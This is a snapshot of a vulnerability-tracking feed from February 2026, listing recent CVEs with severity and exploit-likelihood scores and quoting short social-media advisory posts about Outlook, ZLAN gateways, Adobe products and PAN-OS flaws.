## Updated at UTC 2026-02-11T19:49:25.805063

Access data as JSON

CVE CVSS EPSS Posts Repos Nuclei Updated Description
CVE-2026-21511 7.5 0.26% 2 0 2026-02-11T18:56:56.907000 Deserialization of untrusted data in Microsoft Office Outlook allows an unauthor
CVE-2026-24789 9.8 0.00% 2 0 2026-02-11T18:31:36 An unprotected API endpoint allows an attacker to remotely change the device pas
CVE-2026-25084 9.8 0.00% 2 0 2026-02-11T18:31:36 Authentication for ZLAN5143D can be bypassed by directly accessing internal URLs
CVE-2026-21357 7.8 0.01% 2 0 2026-02-11T18:29:22.320000 InDesign Desktop versions 21.1, 20.5.1 and earlier are affected by a Heap-based
CVE-2026-23717 7.8 0.01% 2 0 2026-02-11T18:24:15.437000 A vulnerability has been identified in Simcenter Femap (All versions < V2512), S
CVE-2026-0229 0 0.00% 2 0 2026-02-11T18:16:07.897000 A denial-of-service (DoS) vulnerability in the Advanced DNS Security (ADNS) feat
CVE-2026-0228 0 0.00% 2 0 2026-02-11T18:16:07.720000 An improper certificate validation vulnerability in PAN-OS allows users to conne
CVE-2026-21320 7.8 0.01% 2 0 2026-02-11T17:37:39.147000 After Effects versions 25.6 and earlier are affected by a Use After Free vulnera
CVE-2026-21323 7.8 0.01% 2 0 2026-02-11T17:37:04.913000 After Effects versions 25.6 and earlier are affected by a Use After Free vulnera
CVE-2026-21324 7.8 0.01% 2 0 2026-02-11T17:36:45.697000 After Effects versions 25.6 and earlier are affected by an out-of-bounds read vu
CVE-2026-21328 7.8 0.01% 2 0 2026-02-11T17:35:50.863000 After Effects versions 25.6 and earlier are affected by an out-of-bounds write v
CVE-2026-21343 7.8 0.03% 2 0 2026-02-11T17:16:03.557000 Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds
CVE-2026-21346 7.8 0.03% 2 0 2026-02-11T17:15:14.187000 Bridge versions 15.1.3, 16.0.1 and earlier are affected by an out-of-bounds writ
CVE-2026-1235 6.5 0.01% 1 0 2026-02-11T16:16:03.583000 The WP eCommerce WordPress plugin through 3.15.1 unserializes user input via aja
CVE-2026-20841 8.8 0.08% 100 3 2026-02-11T15:16:16.997000 Improper neutralization of special elements used in a command ('command injectio
CVE-2026-1560 8.8 0.24% 1 1 2026-02-11T09:30:25 The Custom Block Builder – Lazy Blocks plugin for WordPress is vulnerable to Rem
CVE-2026-1357 9.8 0.46% 2 2 2026-02-11T06:30:48 The Migration, Backup, Staging – WPvivid Backup & Migration plugin for WordPress
CVE-2026-21531 9.8 0.16% 3 0 2026-02-10T21:51:48.077000 Deserialization of untrusted data in Azure SDK allows an unauthorized attacker t
CVE-2026-21246 7.8 0.02% 2 0 2026-02-10T21:51:48.077000 Heap-based buffer overflow in Microsoft Graphics Component allows an authorized
CVE-2026-21257 8.0 0.05% 2 0 2026-02-10T21:51:48.077000 Improper neutralization of special elements used in a command ('command injectio
CVE-2026-21537 8.8 0.05% 2 0 2026-02-10T21:51:48.077000 Improper control of generation of code ('code injection') in Microsoft Defender
CVE-2026-25992 7.5 0.04% 2 0 2026-02-10T21:51:48.077000 SiYuan is a personal knowledge management system. Prior to 3.5.5, the /api/file/
CVE-2026-21352 7.8 0.03% 2 0 2026-02-10T21:51:48.077000 DNG SDK versions 1.7.1 2410 and earlier are affected by an out-of-bounds write v
CVE-2026-1603 8.6 0.15% 2 0 2026-02-10T21:51:48.077000 An authentication bypass in Ivanti Endpoint Manager before version 2024 SU5 allo
CVE-2026-21344 7.8 0.03% 2 0 2026-02-10T21:31:42 Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds
CVE-2026-1507 7.5 0.05% 2 0 2026-02-10T21:31:42 The affected products are vulnerable to an uncaught exception that could allow a
CVE-2026-21349 7.8 0.03% 2 0 2026-02-10T21:31:42 Lightroom Desktop versions 15.1 and earlier are affected by an out-of-bounds wri
CVE-2026-21347 7.8 0.03% 2 0 2026-02-10T21:31:41 Bridge versions 15.1.3, 16.0.1 and earlier are affected by an Integer Overflow o
CVE-2026-21345 7.8 0.03% 2 0 2026-02-10T21:31:41 Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds
CVE-2026-21353 7.8 0.03% 2 0 2026-02-10T21:31:41 DNG SDK versions 1.7.1 2410 and earlier are affected by an Integer Overflow or W
CVE-2026-21341 7.8 0.03% 2 0 2026-02-10T21:31:37 Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds
CVE-2026-21342 7.8 0.01% 2 0 2026-02-10T21:31:37 Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds
CVE-2026-1848 7.5 0.04% 2 0 2026-02-10T21:31:36 Connections received from the proxy port may not count towards total accepted co
CVE-2026-21514 7.8 6.65% 12 0 2026-02-10T21:31:29 Reliance on untrusted inputs in a security decision in Microsoft Office Word all
CVE-2026-21525 6.2 8.55% 10 0 2026-02-10T21:31:29 Null pointer dereference in Windows Remote Access Connection Manager allows an u
CVE-2026-21510 8.8 6.40% 13 0 2026-02-10T21:31:29 Protection mechanism failure in Windows Shell allows an unauthorized attacker to
CVE-2026-21513 8.8 8.83% 12 0 2026-02-10T21:31:29 Protection mechanism failure in MSHTML Framework allows an unauthorized attacker
CVE-2026-21519 7.8 1.67% 11 0 2026-02-10T21:31:29 Access of resource using incompatible type ('type confusion') in Desktop Window
CVE-2026-21533 7.8 1.55% 11 1 2026-02-10T21:31:29 Improper privilege management in Windows Remote Desktop allows an authorized att
CVE-2026-25577 7.5 0.05% 2 0 2026-02-10T19:57:02 ### Summary The `cookies` property in `emmett_core.http.wrappers.Request` does n
CVE-2026-1529 8.1 0.02% 3 2 2026-02-10T18:35:21 A flaw was found in Keycloak. An attacker can exploit this vulnerability by modi
CVE-2026-1486 8.8 0.04% 2 0 2026-02-10T18:35:16 A flaw was found in Keycloak. A vulnerability exists in the jwt-authorization-gr
CVE-2026-25611 7.5 0.04% 2 0 2026-02-10T18:30:54 A series of specifically crafted, unauthenticated messages can exhaust available
CVE-2026-21260 7.5 0.08% 2 0 2026-02-10T18:30:52 Exposure of sensitive information to an unauthorized actor in Microsoft Office O
CVE-2026-21259 7.8 0.04% 2 0 2026-02-10T18:30:52 Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized atta
CVE-2026-21322 7.8 0.01% 2 0 2026-02-10T18:30:52 After Effects versions 25.6 and earlier are affected by an out-of-bounds read vu
CVE-2026-21318 7.8 0.01% 2 0 2026-02-10T18:30:52 After Effects versions 25.6 and earlier are affected by an out-of-bounds write v
CVE-2026-21330 7.8 0.01% 2 0 2026-02-10T18:30:52 After Effects versions 25.6 and earlier are affected by an Access of Resource Us
CVE-2026-21327 7.8 0.01% 2 0 2026-02-10T18:30:52 After Effects versions 25.6 and earlier are affected by an out-of-bounds write v
CVE-2026-21251 7.8 0.04% 2 0 2026-02-10T18:30:51 Use after free in Windows Cluster Client Failover allows an authorized attacker
CVE-2026-21250 7.8 0.04% 2 0 2026-02-10T18:30:51 Untrusted pointer dereference in Windows HTTP.sys allows an authorized attacker
CVE-2026-21329 7.8 0.01% 2 0 2026-02-10T18:30:51 After Effects versions 25.6 and earlier are affected by a Use After Free vulnera
CVE-2026-21326 7.8 0.01% 2 0 2026-02-10T18:30:51 After Effects versions 25.6 and earlier are affected by a Use After Free vulnera
CVE-2026-21351 7.8 0.01% 2 0 2026-02-10T18:30:51 After Effects versions 25.6 and earlier are affected by a Use After Free vulnera
CVE-2026-21256 8.8 0.05% 2 0 2026-02-10T18:30:50 Improper neutralization of special elements used in a command ('command injectio
CVE-2026-21255 8.8 0.03% 2 0 2026-02-10T18:30:50 Improper access control in Windows Hyper-V allows an authorized attacker to bypa
CVE-2026-21312 7.8 0.01% 2 0 2026-02-10T18:30:50 Audition versions 25.3 and earlier are affected by an out-of-bounds write vulner
CVE-2026-21321 7.8 0.01% 2 0 2026-02-10T18:30:50 After Effects versions 25.6 and earlier are affected by an Integer Overflow or W
CVE-2026-21325 7.8 0.01% 2 0 2026-02-10T18:30:50 After Effects versions 25.6 and earlier are affected by an out-of-bounds read vu
CVE-2026-21335 7.8 0.01% 2 0 2026-02-10T18:30:50 Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bou
CVE-2026-21334 7.8 0.01% 2 0 2026-02-10T18:30:50 Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bou
CVE-2026-21516 8.8 0.04% 2 0 2026-02-10T18:30:50 Improper neutralization of special elements used in a command ('command injectio
CVE-2026-22153 8.1 0.07% 1 0 2026-02-10T18:30:48 An Authentication Bypass by Primary Weakness vulnerability [CWE-305] vulnerabili
CVE-2025-52436 8.8 0.14% 1 0 2026-02-10T18:30:40 An Improper Neutralization of Input During Web Page Generation ('Cross-site Scri
CVE-2026-1602 6.5 0.05% 2 0 2026-02-10T18:30:38 SQL injection in Ivanti Endpoint Manager before version 2024 SU5 allows a remote
CVE-2026-24061 9.8 36.95% 4 62 template 2026-02-10T18:30:34 telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a "
CVE-2025-6967 8.7 0.02% 4 0 2026-02-10T15:30:34 Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technol
CVE-2026-0509 9.6 0.04% 6 0 2026-02-10T15:22:54.740000 SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated,
CVE-2026-23687 8.8 0.05% 5 0 2026-02-10T15:22:54.740000 SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated
CVE-2025-40587 7.6 0.02% 2 0 2026-02-10T15:22:54.740000 A vulnerability has been identified in Polarion V2404 (All versions < V2404.5),
CVE-2026-25656 7.8 0.01% 2 0 2026-02-10T15:22:54.740000 A vulnerability has been identified in SINEC NMS (All versions), User Management
CVE-2025-11242 9.8 0.04% 2 0 2026-02-10T15:22:54.740000 Server-Side Request Forgery (SSRF) vulnerability in Teknolist Computer Systems S
CVE-2026-2094 8.8 0.08% 4 0 2026-02-10T15:22:54.740000 Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authe
CVE-2026-2093 7.5 0.05% 1 0 2026-02-10T15:22:54.740000 Docpedia developed by Flowring has a SQL Injection vulnerability, allowing unaut
CVE-2026-0485 7.5 0.04% 1 0 2026-02-10T15:22:54.740000 SAP BusinessObjects BI Platform allows an unauthenticated attacker to send speci
CVE-2025-15310 7.8 0.02% 1 0 2026-02-10T15:22:54.740000 Tanium addressed a local privilege escalation vulnerability in Patch Endpoint To
CVE-2026-25890 8.1 0.03% 1 0 2026-02-10T15:22:54.740000 File Browser provides a file managing interface within a specified directory and
CVE-2026-25961 7.5 0.01% 1 1 2026-02-10T15:22:54.740000 SumatraPDF is a multi-format reader for Windows. In 3.5.0 through 3.5.2, Sumatra
CVE-2026-24684 7.5 0.04% 2 0 2026-02-10T15:02:32.033000 FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0
CVE-2026-23720 7.8 0.01% 2 0 2026-02-10T12:30:34 A vulnerability has been identified in Simcenter Femap (All versions < V2512), S
CVE-2026-2268 7.5 0.06% 2 1 2026-02-10T12:30:34 The Ninja Forms plugin for WordPress is vulnerable to Sensitive Information Expo
CVE-2026-22923 7.8 0.01% 2 0 2026-02-10T12:30:33 A vulnerability has been identified in NX (All versions < V2512). The affected a
CVE-2026-25655 7.8 0.01% 2 0 2026-02-10T12:30:33 A vulnerability has been identified in SINEC NMS (All versions < V4.0 SP2). The
CVE-2026-23719 7.8 0.01% 2 0 2026-02-10T12:30:28 A vulnerability has been identified in Simcenter Femap (All versions < V2512), S
CVE-2026-23718 7.8 0.01% 2 0 2026-02-10T12:30:28 A vulnerability has been identified in Simcenter Femap (All versions < V2512), S
CVE-2026-23716 7.8 0.01% 2 0 2026-02-10T12:30:28 A vulnerability has been identified in Simcenter Femap (All versions < V2512), S
CVE-2026-23715 7.8 0.01% 2 0 2026-02-10T12:30:27 A vulnerability has been identified in Simcenter Femap (All versions < V2512), S
CVE-2026-2095 9.8 0.17% 3 0 2026-02-10T09:30:31 Agentflow developed by Flowring has an Authentication Bypass vulnerability, allo
CVE-2026-2096 9.8 0.13% 5 0 2026-02-10T09:30:31 Agentflow developed by Flowring has a Missing Authentication vulnerability, allo
CVE-2026-2097 8.8 0.21% 4 0 2026-02-10T09:30:31 Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allo
CVE-2026-24322 7.7 0.03% 2 0 2026-02-10T06:30:45 SAP Solution Tools Plug-In (ST-PI) contains a function module that does not perf
CVE-2026-23689 7.7 0.07% 1 0 2026-02-10T06:30:44 Due to an uncontrolled resource consumption (Denial of Service) vulnerability, a
CVE-2025-11547 7.8 0.01% 1 0 2026-02-10T06:30:40 AXIS Camera Station Pro contained a flaw to perform a privilege escalation attac
CVE-2026-0490 7.5 0.08% 1 0 2026-02-10T06:30:39 SAP BusinessObjects BI Platform allows an unauthenticated attacker to craft a sp
CVE-2026-0488 10.0 0.04% 3 0 2026-02-10T06:30:38 An authenticated attacker in SAP CRM and SAP S/4HANA (Scripting Editor) could ex
CVE-2026-25958 7.7 0.01% 1 0 2026-02-10T02:57:34 ### **Impact** It is possible to make a specially crafted request with a valid
CVE-2026-25939 None 0.03% 1 1 2026-02-10T02:56:59 ### Summary An authorization bypass vulnerability in the FUXA allows an unauthen
CVE-2026-25881 9.1 0.05% 1 0 2026-02-10T02:56:34 ### Summary A sandbox escape vulnerability allows sandboxed code to mutate host
CVE-2026-25892 7.5 0.06% 1 0 2026-02-10T02:56:05 ### Summary Adminer v5.4.1 has a version check mechanism where `adminer.org` sen
CVE-2025-15319 7.8 0.01% 1 0 2026-02-10T00:30:37 Tanium addressed a local privilege escalation vulnerability in Patch Endpoint To
CVE-2026-25791 7.5 0.04% 1 0 2026-02-09T22:39:51 ## Summary The DNS C2 listener accepts unauthenticated `TOTP` bootstrap messages
CVE-2026-25639 7.5 0.01% 2 0 2026-02-09T22:39:36 # Denial of Service via **proto** Key in mergeConfig ### Summary The `mergeCon
CVE-2026-25761 8.8 0.04% 1 0 2026-02-09T21:55:30.093000 Super-linter is a combination of multiple linters to run as a GitHub Action or s
CVE-2026-25057 9.1 0.04% 1 0 2026-02-09T21:55:30.093000 MarkUs is a web application for the submission and grading of student assignment
CVE-2025-69214 8.8 0.01% 1 0 2026-02-09T21:53:03.017000 OpenSTAManager is an open source management software for technical assistance an
CVE-2026-2234 9.1 0.05% 2 0 2026-02-09T09:30:28 C&Cm@il developed by HGiga has a Missing Authentication vulnerability, allowing
CVE-2026-1731 None 3.57% 2 3 template 2026-02-07T00:30:34 BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote
CVE-2025-69212 None 0.09% 1 0 2026-02-06T22:11:48 ## Summary A critical OS Command Injection vulnerability exists in the P7M (sign
CVE-2026-25752 None 0.04% 2 0 2026-02-06T21:42:47 ### Summary **Description** An authorization bypass vulnerability in FUXA allows
CVE-2026-25751 None 0.02% 2 0 2026-02-06T21:42:43 ### Description An information disclosure vulnerability in FUXA allows an unauth
CVE-2025-64175 None 0.01% 2 0 2026-02-06T19:06:46 Contact OpenAI Security Research at outbounddisclosures@openai.com to engage on
CVE-2025-64111 None 0.09% 2 0 2026-02-06T19:06:45 ### Summary Due to the insufficient patch for the https://github.com/gogs/gogs/s
CVE-2026-2103 7.1 0.01% 1 0 2026-02-06T18:30:43 Infor SyteLine ERP uses hard-coded static cryptographic keys to encrypt stored c
CVE-2026-24423 9.8 9.22% 1 1 2026-02-06T18:30:29 SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated
CVE-2026-0227 7.5 0.06% 2 2 2026-02-06T17:37:28.723000 A vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated
CVE-2026-21643 9.8 0.13% 6 0 2026-02-06T09:30:35 An improper neutralization of special elements used in an sql command ('sql inje
CVE-2026-25049 9.9 0.03% 5 1 2026-02-05T20:22:47.870000 n8n is an open source workflow automation platform. Prior to versions 1.123.17 a
CVE-2026-20119 7.5 0.09% 2 0 2026-02-05T14:57:20.563000 A vulnerability in the text rendering subsystem of Cisco TelePresence Collaborat
CVE-2025-24054 6.5 11.25% 1 9 2026-02-04T21:31:24 External control of file name or path in Windows NTLM allows an unauthorized att
CVE-2025-40551 9.8 54.99% 1 0 template 2026-02-04T02:00:02.030000 SolarWinds Web Help Desk was found to be susceptible to an untrusted data deseri
CVE-2026-1281 9.8 16.41% 2 1 2026-01-30T13:28:18.610000 A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve
CVE-2026-1340 9.8 0.18% 2 1 2026-01-30T00:31:28 A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve
CVE-2015-10145 8.8 0.10% 2 0 2026-01-29T18:32:39 Gargoyle router management utility versions 1.5.x contain an authenticated OS co
CVE-2025-15467 9.8 0.66% 2 4 2026-01-29T15:31:31 Issue summary: Parsing CMS AuthEnvelopedData message with maliciously crafted AE
CVE-2026-20817 7.8 0.06% 1 0 2026-01-13T18:31:17 Improper handling of insufficient permissions or privileges in Windows Error Rep
CVE-2026-20026 5.8 0.13% 2 0 2026-01-08T18:08:54.147000 Multiple&nbsp;Cisco products are affected by a vulnerability in the processing o
CVE-2026-20027 5.3 0.04% 2 0 2026-01-08T18:08:54.147000 Multiple Cisco products are affected by a vulnerability in the processing of DCE
CVE-2023-4911 7.8 73.04% 1 17 template 2026-01-08T16:28:27.603000 A buffer overflow was discovered in the GNU C Library's dynamic loader ld.so whi
CVE-2025-43529 8.8 0.03% 2 7 2025-12-18T14:59:05.617000 A use-after-free issue was addressed with improved memory management. This issue
CVE-2025-14174 8.8 0.65% 2 6 2025-12-15T15:16:08.650000 Out of bounds memory access in ANGLE in Google Chrome on Mac prior to 143.0.7499
CVE-2024-2511 5.9 3.67% 1 0 2025-11-04T00:31:52 Issue summary: Some non-default TLS server configurations can cause unbounded me
CVE-2025-60787 7.2 40.20% 1 1 2025-11-03T21:48:21 ## Summary A command injection vulnerability in MotionEye allows attackers to ac
CVE-2025-8088 8.8 3.90% 2 28 2025-10-22T00:34:26 A path traversal vulnerability affecting the Windows version of WinRAR allows th
CVE-2025-53770 9.8 89.20% 4 46 template 2025-10-22T00:34:26 Deserialization of untrusted data in on-premises Microsoft SharePoint Server all
CVE-2018-0802 7.8 93.89% 2 7 2025-10-22T00:31:30 Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Offic
CVE-2025-26399 9.8 12.86% 4 1 2025-09-23T06:30:33 SolarWinds Web Help Desk was found to be susceptible to an unauthenticated AjaxP
CVE-2025-59375 7.5 0.12% 1 0 2025-09-17T15:31:32 libexpat in Expat before 2.7.2 allows attackers to trigger large dynamic memory
CVE-2025-27158 7.8 0.04% 1 0 2025-04-28T16:48:57.070000 Acrobat Reader versions 24.001.30225, 20.005.30748, 25.001.20428 and earlier are
CVE-2025-3573 6.1 0.25% 2 0 2025-04-15T14:24:22 Versions of the package jquery-validation before 1.20.0 are vulnerable to Cross-
CVE-2026-20700 0 0.00% 2 0 N/A
CVE-2026-25993 0 0.03% 1 0 N/A
CVE-2026-26009 0 0.26% 3 0 N/A
CVE-2026-21523 0 0.04% 2 0 N/A
CVE-2026-25947 0 0.03% 2 0 N/A
CVE-2026-25506 0 0.02% 2 0 N/A
CVE-2026-24682 0 0.04% 2 0 N/A
CVE-2026-25646 0 0.04% 2 0 N/A
CVE-2026-23876 0 0.06% 1 0 N/A
CVE-2026-24476 0 0.03% 1 0 N/A
CVE-2026-25931 0 0.01% 1 0 N/A
CVE-2026-25808 0 0.03% 1 0 N/A
CVE-2026-25807 0 0.11% 1 1 N/A
CVE-2026-25880 0 0.01% 1 0 N/A
CVE-2026-25925 0 0.05% 1 0 N/A
CVE-2026-25231 0 0.06% 2 0 N/A

CVE-2026-21511
(7.5 HIGH)

EPSS: 0.26%

updated 2026-02-11T18:56:56.907000

2 posts

Deserialization of untrusted data in Microsoft Office Outlook allows an unauthorized attacker to perform spoofing over a network.

thehackerwire@mastodon.social at 2026-02-10T23:38:22.000Z ##

🟠 CVE-2026-21511 - High (7.5)

Deserialization of untrusted data in Microsoft Office Outlook allows an unauthorized attacker to perform spoofing over a network.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T23:38:22.000Z ##

🟠 CVE-2026-21511 - High (7.5)

Deserialization of untrusted data in Microsoft Office Outlook allows an unauthorized attacker to perform spoofing over a network.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24789
(9.8 CRITICAL)

EPSS: 0.00%

updated 2026-02-11T18:31:36

2 posts

An unprotected API endpoint allows an attacker to remotely change the device password without providing authentication.

beyondmachines1 at 2026-02-11T16:01:32.677Z ##

Critical Authentication Bypass Flaws Reported in ZLAN Industrial Gateways

ZLAN5143D industrial gateways contain two critical vulnerabilities (CVE-2026-25084 and CVE-2026-24789) that allow unauthenticated remote attackers to bypass security and reset device passwords. The vendor has not yet responded to these issues and there are no patches.

**If you use ZLAN5143D gateways, make sure they are isolated from the internet and accessible only from trusted networks. Since the vendor hasn't provided a patch, network isolation and VPN-only access are your only defense. Reach out to the vendor for patches, and if no patches are available, start planning a replacement.**

beyondmachines.net/event_detai

##

beyondmachines1@infosec.exchange at 2026-02-11T16:01:32.000Z ##

Critical Authentication Bypass Flaws Reported in ZLAN Industrial Gateways

ZLAN5143D industrial gateways contain two critical vulnerabilities (CVE-2026-25084 and CVE-2026-24789) that allow unauthenticated remote attackers to bypass security and reset device passwords. The vendor has not yet responded to these issues and there are no patches.

**If you use ZLAN5143D gateways, make sure they are isolated from the internet and accessible only from trusted networks. Since the vendor hasn't provided a patch, network isolation and VPN-only access are your only defense. Reach out to the vendor for patches, and if no patches are available, start planning a replacement.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2026-25084
(9.8 CRITICAL)

EPSS: 0.00%

updated 2026-02-11T18:31:36

2 posts

Authentication for ZLAN5143D can be bypassed by directly accessing internal URLs.

beyondmachines1 at 2026-02-11T16:01:32.677Z ##

Critical Authentication Bypass Flaws Reported in ZLAN Industrial Gateways

ZLAN5143D industrial gateways contain two critical vulnerabilities (CVE-2026-25084 and CVE-2026-24789) that allow unauthenticated remote attackers to bypass security and reset device passwords. The vendor has not yet responded to these issues and there are no patches.

**If you use ZLAN5143D gateways, make sure they are isolated from the internet and accessible only from trusted networks. Since the vendor hasn't provided a patch, network isolation and VPN-only access are your only defense. Reach out to the vendor for patches, and if no patches are available, start planning a replacement.**

beyondmachines.net/event_detai

##

beyondmachines1@infosec.exchange at 2026-02-11T16:01:32.000Z ##

Critical Authentication Bypass Flaws Reported in ZLAN Industrial Gateways

ZLAN5143D industrial gateways contain two critical vulnerabilities (CVE-2026-25084 and CVE-2026-24789) that allow unauthenticated remote attackers to bypass security and reset device passwords. The vendor has not yet responded to these issues and there are no patches.

**If you use ZLAN5143D gateways, make sure they are isolated from the internet and accessible only from trusted networks. Since the vendor hasn't provided a patch, network isolation and VPN-only access are your only defense. Reach out to the vendor for patches, and if no patches are available, start planning a replacement.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2026-21357
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-11T18:29:22.320000

2 posts

InDesign Desktop versions 21.1, 20.5.1 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-10T23:40:21.000Z ##

🟠 CVE-2026-21357 - High (7.8)

InDesign Desktop versions 21.1, 20.5.1 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T23:40:21.000Z ##

🟠 CVE-2026-21357 - High (7.8)

InDesign Desktop versions 21.1, 20.5.1 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23717
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-11T18:24:15.437000

2 posts

A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted XDB files. This could allow an attacker to execute code in the context of the current process.

thehackerwire@mastodon.social at 2026-02-10T11:01:07.000Z ##

🟠 CVE-2026-23717 - High (7.8)

A vulnerability has been identified in Simcenter Femap (All versions &lt; V2512), Simcenter Nastran (All versions &lt; V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted XDB files. This c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T11:01:07.000Z ##

🟠 CVE-2026-23717 - High (7.8)

A vulnerability has been identified in Simcenter Femap (All versions &lt; V2512), Simcenter Nastran (All versions &lt; V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted XDB files. This c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0229
(0 None)

EPSS: 0.00%

updated 2026-02-11T18:16:07.897000

2 posts

A denial-of-service (DoS) vulnerability in the Advanced DNS Security (ADNS) feature of Palo Alto Networks PAN-OS® software enables an unauthenticated attacker to initiate system reboots using a maliciously crafted packet. Repeated attempts to initiate a reboot causes the firewall to enter maintenance mode. Cloud NGFW and Prisma Access® are not impacted by this vulnerability.

AAKL at 2026-02-11T17:56:10.869Z ##

Palo Alto has three new advisories.

- This affects several CVEs: PAN-SA-2026-0002 Chromium: Monthly Vulnerability Update (February 2026) security.paloaltonetworks.com/

- CVE-2026-0229 PAN-OS: Denial of Service in Advanced DNS Security Feature security.paloaltonetworks.com/

- CVE-2026-0228 PAN-OS: Improper Validation of Terminal Server Agent Certificate security.paloaltonetworks.com/

##

AAKL@infosec.exchange at 2026-02-11T17:56:10.000Z ##

Palo Alto has three new advisories.

- This affects several CVEs: PAN-SA-2026-0002 Chromium: Monthly Vulnerability Update (February 2026) security.paloaltonetworks.com/

- CVE-2026-0229 PAN-OS: Denial of Service in Advanced DNS Security Feature security.paloaltonetworks.com/

- CVE-2026-0228 PAN-OS: Improper Validation of Terminal Server Agent Certificate security.paloaltonetworks.com/ #PaloAlto #infosec #vulnerability

##

CVE-2026-0228
(0 None)

EPSS: 0.00%

updated 2026-02-11T18:16:07.720000

2 posts

An improper certificate validation vulnerability in PAN-OS allows users to connect Terminal Server Agents on Windows to PAN-OS using expired certificates even if the PAN-OS configuration would not normally permit them to do so.

AAKL at 2026-02-11T17:56:10.869Z ##

Palo Alto has three new advisories.

- This affects several CVEs: PAN-SA-2026-0002 Chromium: Monthly Vulnerability Update (February 2026) security.paloaltonetworks.com/

- CVE-2026-0229 PAN-OS: Denial of Service in Advanced DNS Security Feature security.paloaltonetworks.com/

- CVE-2026-0228 PAN-OS: Improper Validation of Terminal Server Agent Certificate security.paloaltonetworks.com/

##

AAKL@infosec.exchange at 2026-02-11T17:56:10.000Z ##

Palo Alto has three new advisories.

- This affects several CVEs: PAN-SA-2026-0002 Chromium: Monthly Vulnerability Update (February 2026) security.paloaltonetworks.com/

- CVE-2026-0229 PAN-OS: Denial of Service in Advanced DNS Security Feature security.paloaltonetworks.com/

- CVE-2026-0228 PAN-OS: Improper Validation of Terminal Server Agent Certificate security.paloaltonetworks.com/ #PaloAlto #infosec #vulnerability

##

CVE-2026-21320
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-11T17:37:39.147000

2 posts

After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-11T00:35:25.000Z ##

🟠 CVE-2026-21320 - High (7.8)

After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-11T00:35:25.000Z ##

🟠 CVE-2026-21320 - High (7.8)

After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21323
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-11T17:37:04.913000

2 posts

After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-11T01:15:10.000Z ##

🟠 CVE-2026-21323 - High (7.8)

After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-11T01:15:10.000Z ##

🟠 CVE-2026-21323 - High (7.8)

After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...

🔗 thehackerwire.com/vulnerabilit

